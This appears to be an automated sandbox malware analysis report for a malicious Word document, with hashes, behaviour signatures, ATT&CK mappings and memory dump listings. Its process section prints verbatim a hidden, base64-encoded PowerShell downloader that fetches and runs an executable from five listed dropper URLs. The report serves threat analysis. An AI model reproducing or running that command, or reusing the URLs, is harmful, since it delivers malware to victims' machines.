000444a623568f34fca2d4281a5bb95c13686514625941b4c53c0db63762a872

General

Target

index.html.doc
Size

246KB
MD5

9321a4e2cd4141a43965bc0dd98fc46e
SHA1

43efb3b3e1da7b4788d27c9549264b5d2a111cc2
SHA256

000444a623568f34fca2d4281a5bb95c13686514625941b4c53c0db63762a872
SHA512

7cb7a78d8575bda664042c1a5a6579f6caea344493cfc6be754270cee57b53932698db9ee9c268249f444bbe144243c83795b218973f6b90f33c96d6f11808b7
SSDEEP

6144:R0Rum7mdLRp1bbSBIR/EHGtCMXgTo8qoFt/etg+21pbys:R0E3dxtR/iU9mvUPGys

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://demo.voolatech.com/360/yo12394/

exe.dropper

http://vikisa.com/administrator/OMM4w/

exe.dropper

https://snchealthmedico.com/software/FxbWe5q/

exe.dropper

http://conilizate.com/Sitio_web/8PzLe0/

exe.dropper

https://myevol.biz/webanterior/kid/

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	228	4104	Powershell.exe	49

Blocklisted process makes network request 6 IoCs

flow	pid	Process
23	228	Powershell.exe
50	228	Powershell.exe
52	228	Powershell.exe
53	228	Powershell.exe
55	228	Powershell.exe
59	228	Powershell.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 2 IoCs

pid	Process
1228	WINWORD.EXE
1228	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
228	Powershell.exe
228	Powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	228	Powershell.exe

Suspicious use of SetWindowsHookEx 8 IoCs

pid	Process
1228	WINWORD.EXE
1228	WINWORD.EXE
1228	WINWORD.EXE
1228	WINWORD.EXE
1228	WINWORD.EXE
1228	WINWORD.EXE
1228	WINWORD.EXE
1228	WINWORD.EXE

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\index.html.doc" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:1228

C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
Powershell -w hidden -en JABPAG0AaQByAHYAbwBtAHAAcABjAGwAYQBpAD0AJwBQAGwAdQBqAGEAbQBqAGoAeQBqAHAAJwA7ACQASQBjAHkAeABvAHAAZgBpAHoAZgBrAHoAYwAgAD0AIAAnADEANwA2ACcAOwAkAEcAdwBpAG0AawBmAHgAbwA9ACcASgB2AG4AagB1AGMAcAB3AHUAbAAnADsAJABWAG4AagBpAHIAdgBsAGMAaAB1AGsAdwBmAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABJAGMAeQB4AG8AcABmAGkAegBmAGsAegBjACsAJwAuAGUAeABlACcAOwAkAEUAcwBwAGsAZgBjAGsAaQBnAGsAYwBsAGkAPQAnAE8AeQBpAHEAYgB4AGwAYQAnADsAJABaAGUAYQBmAHcAawB0AHcAcgB6AHIAYwB6AD0ALgAoACcAbgBlAHcALQAnACsAJwBvAGIAagBlAGMAJwArACcAdAAnACkAIABuAEUAdAAuAFcARQBCAGMAbABJAEUATgBUADsAJABNAHcAdQB1AHEAcgBiAHcAeABoAHkAdwBkAD0AJwBoAHQAdABwAHMAOgAvAC8AZABlAG0AbwAuAHYAbwBvAGwAYQB0AGUAYwBoAC4AYwBvAG0ALwAzADYAMAAvAHkAbwAxADIAMwA5ADQALwAqAGgAdAB0AHAAOgAvAC8AdgBpAGsAaQBzAGEALgBjAG8AbQAvAGEAZABtAGkAbgBpAHMAdAByAGEAdABvAHIALwBPAE0ATQA0AHcALwAqAGgAdAB0AHAAcwA6AC8ALwBzAG4AYwBoAGUAYQBsAHQAaABtAGUAZABpAGMAbwAuAGMAbwBtAC8AcwBvAGYAdAB3AGEAcgBlAC8ARgB4AGIAVwBlADUAcQAvACoAaAB0AHQAcAA6AC8ALwBjAG8AbgBpAGwAaQB6AGEAdABlAC4AYwBvAG0ALwBTAGkAdABpAG8AXwB3AGUAYgAvADgAUAB6AEwAZQAwAC8AKgBoAHQAdABwAHMAOgAvAC8AbQB5AGUAdgBvAGwALgBiAGkAegAvAHcAZQBiAGEAbgB0AGUAcgBpAG8AcgAvAGsAaQBkAC8AJwAuACIAUwBgAFAAbABpAFQAIgAoACcAKgAnACkAOwAkAEEAbwB2AHUAcwBqAHkAbwBoAHIAcQB3AGEAPQAnAEUAZgBkAHoAdABiAGEAbwB6AGIAeQBtACcAOwBmAG8AcgBlAGEAYwBoACgAJABaAG0AcgB6AGgAaQBwAGgAaAAgAGkAbgAgACQATQB3AHUAdQBxAHIAYgB3AHgAaAB5AHcAZAApAHsAdAByAHkAewAkAFoAZQBhAGYAdwBrAHQAdwByAHoAcgBjAHoALgAiAEQAbwBgAHcATgBsAG8AYABBAGQARgBgAGkATABFACIAKAAkAFoAbQByAHoAaABpAHAAaABoACwAIAAkAFYAbgBqAGkAcgB2AGwAYwBoAHUAawB3AGYAKQA7ACQAQgBzAHMAawBsAGYAbwBvAG8AbgBhAD0AJwBCAHAAbQByAHgAaQB2AHgAcwBpAGEAbAB4ACcAOwBJAGYAIAAoACgALgAoACcARwBlAHQAJwArACcALQBJAHQAZQBtACcAKQAgACQAVgBuAGoAaQByAHYAbABjAGgAdQBrAHcAZgApAC4AIgBsAGUAbgBgAGcAYABUAEgAIgAgAC0AZwBlACAAMwA5ADYAOQA4ACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAHMAdABgAEEAUgBUACIAKAAkAFYAbgBqAGkAcgB2AGwAYwBoAHUAawB3AGYAKQA7ACQAVAB0AHcAZABhAGcAeQB5AG0AcAB2AGcAcAA9ACcAWQBwAGQAegB6AG4AagBiAGUAeQBwACcAOwBiAHIAZQBhAGsAOwAkAFIAegBuAGYAbgBzAHUAdABkAHoAPQAnAFEAbgBmAGkAbgBvAGkAYgBzAGIAdgB0ACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEkAagBzAHMAZgBrAHgAbwA9ACcAQgBwAHQAeAB3AHcAdgBwAGcAZQAnAA==
1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:228

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_haxuzg4z.fdm.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/228-179-0x0000021D7D0C0000-0x0000021D7D0D0000-memory.dmp

Filesize
64KB

Download
memory/228-168-0x0000021D7D0C0000-0x0000021D7D0D0000-memory.dmp

Filesize
64KB

Download
memory/228-180-0x0000021D7D0C0000-0x0000021D7D0D0000-memory.dmp

Filesize
64KB

Download
memory/228-178-0x0000021D7D0C0000-0x0000021D7D0D0000-memory.dmp

Filesize
64KB

Download
memory/228-169-0x0000021D7D0C0000-0x0000021D7D0D0000-memory.dmp

Filesize
64KB

Download
memory/228-167-0x0000021D7D040000-0x0000021D7D062000-memory.dmp

Filesize
136KB

Download
memory/228-170-0x0000021D7D0C0000-0x0000021D7D0D0000-memory.dmp

Filesize
64KB

Download
memory/1228-139-0x00007FFC89DB0000-0x00007FFC89DC0000-memory.dmp

Filesize
64KB

Download
memory/1228-134-0x00007FFC8C1B0000-0x00007FFC8C1C0000-memory.dmp

Filesize
64KB

Download
memory/1228-135-0x00007FFC8C1B0000-0x00007FFC8C1C0000-memory.dmp

Filesize
64KB

Download
memory/1228-177-0x000001A0F3650000-0x000001A0F3850000-memory.dmp

Filesize
2.0MB

Download
memory/1228-156-0x000001A0F3650000-0x000001A0F3850000-memory.dmp

Filesize
2.0MB

Download
memory/1228-138-0x00007FFC89DB0000-0x00007FFC89DC0000-memory.dmp

Filesize
64KB

Download
memory/1228-137-0x00007FFC8C1B0000-0x00007FFC8C1C0000-memory.dmp

Filesize
64KB

Download
memory/1228-133-0x00007FFC8C1B0000-0x00007FFC8C1C0000-memory.dmp

Filesize
64KB

Download
memory/1228-136-0x00007FFC8C1B0000-0x00007FFC8C1C0000-memory.dmp

Filesize
64KB

Download
memory/1228-202-0x00007FFC8C1B0000-0x00007FFC8C1C0000-memory.dmp

Filesize
64KB

Download
memory/1228-203-0x00007FFC8C1B0000-0x00007FFC8C1C0000-memory.dmp

Filesize
64KB

Download
memory/1228-204-0x00007FFC8C1B0000-0x00007FFC8C1C0000-memory.dmp

Filesize
64KB

Download
memory/1228-205-0x00007FFC8C1B0000-0x00007FFC8C1C0000-memory.dmp

Filesize
64KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads